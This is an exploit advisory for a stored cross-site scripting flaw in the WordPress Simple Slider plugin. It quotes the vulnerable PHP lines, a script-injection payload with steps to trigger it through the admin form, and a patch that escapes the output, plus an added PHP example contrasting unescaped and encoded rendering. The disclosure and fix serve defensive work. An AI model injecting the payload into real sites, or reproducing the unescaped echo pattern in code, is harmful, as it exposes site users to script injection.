Wordpress WP Slider Plugin Cross Site Scripting

2015.08.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################
# Exploit Title : Wordpress WP Slider Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/simple-slider-ssp/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link : https://downloads.wordpress.org/plugin/simple-slider-ssp.1.4.zip
# Version : 1.4.1
######################
# Vulnerable File : views/options_meta_box.php (Edit and Add Slider)
######################
# Vulnerable Codes :

108:<input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo $slider_options['height'] ?>" />

142:<input type="text" style='width: 80%' name="slider_options[width]" value="<?php echo $slider_options['width'] ?>" />

192:<input type="text" style="width: 80%" name="slider_options[cycle_speed]" value="<?php echo $slider_options['cycle_speed']; ?>" /> <?php _e( 'Seconds', 'ssp' ); ?>

211:<input type="text" style="width: 80%" name="slider_options[animation_speed]" value="<?php echo $slider_options['animation_speed']; ?>" /> <?php _e( 'Seconds', 'ssp' ); ?>

Each of these lines echoes a stored slider option straight into the value attribute without any output encoding, so a value containing a double quote closes the attribute and the rest is rendered as markup.

######################
# Exploit :
To test for cross-site scripting, this payload can be used in any of the inputs above:

"><script>alert(/xss/)</script><

1- http://localhost/pentest/wordpress/wp-admin/edit.php?post_type=ssp_slider (add new)
2- Fill the Height, Width, Cycle speed and Animation speed fields with the payload above.
3- Click on "create slider".
4- The injected script executes (XSS alerts).
######################
# Patch:
To fix this vulnerability, encode the value with the htmlspecialchars() function before echoing it:

<input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo htmlspecialchars($slider_options['height']) ?>" />

Apply the same change to the other lines, too.
######################
# Discovered By : Ehsan Hosseini.
# Spc Tnx : H_SQLI.EMpiRe , Channel , Amir-Mahmod and All Ashiyane Members.
######################
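The following is an added example, not code from the plugin or the advisory: it reproduces the unescaped attribute rendering from options_meta_box.php beside the encoded form the patch describes, and adds numeric validation on save for the four option fields named in the advisory (the function names, and the assumption that $slider_options holds untrusted post meta, are mine).

```php
<?php
// Added example (not the plugin's code). Assumption: $slider_options is loaded
// from post meta and may contain attacker-controlled strings.

function render_field_vulnerable(string $name, $value): string {
    // Mirrors the reported lines: the raw value lands inside a double-quoted
    // attribute, so a leading "> closes it and the remainder becomes markup.
    return '<input type="text" style="width: 80%" name="slider_options[' . $name . ']"'
         . ' value="' . $value . '" />';
}

function render_field_fixed(string $name, $value): string {
    // The advisory's patch calls htmlspecialchars() with default flags, which
    // is enough for a double-quoted attribute. ENT_QUOTES also encodes ' so the
    // same output is safe in the single-quoted attributes on lines 108/142, and
    // ENT_SUBSTITUTE avoids an empty string on invalid UTF-8. In WordPress,
    // esc_attr() is the equivalent helper.
    $safe = htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" style="width: 80%" name="slider_options[' . $name . ']"'
         . ' value="' . $safe . '" />';
}

// Validation on save, an addition beyond the advisory's patch: height, width,
// cycle speed and animation speed are numbers, so non-numeric input can be
// dropped before it is ever stored. Output encoding is still required.
function sanitize_slider_options(array $raw): array {
    $clean = [];
    foreach (['height', 'width', 'cycle_speed', 'animation_speed'] as $key) {
        $v = $raw[$key] ?? '';
        $clean[$key] = is_numeric($v) ? (string) (0 + $v) : '';
    }
    return $clean;
}

// Constructed sample input using the payload quoted in the advisory.
$slider_options = [
    'height' => '"><script>alert(/xss/)</script><',
    'width'  => '400',
];

// Vulnerable rendering: the attribute closes early and a <script> element is emitted.
echo render_field_vulnerable('height', $slider_options['height']), PHP_EOL;

// Fixed rendering: the quote and angle brackets are emitted as HTML entities
// and the browser shows the payload as literal text in the field.
echo render_field_fixed('height', $slider_options['height']), PHP_EOL;

// Validation: the payload is rejected for 'height', '400' is kept for 'width'.
var_dump(sanitize_slider_options($slider_options));
```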

References:

https://wordpress.org/plugins/simple-slider-ssp/


Copyright 2024, cxsecurity.com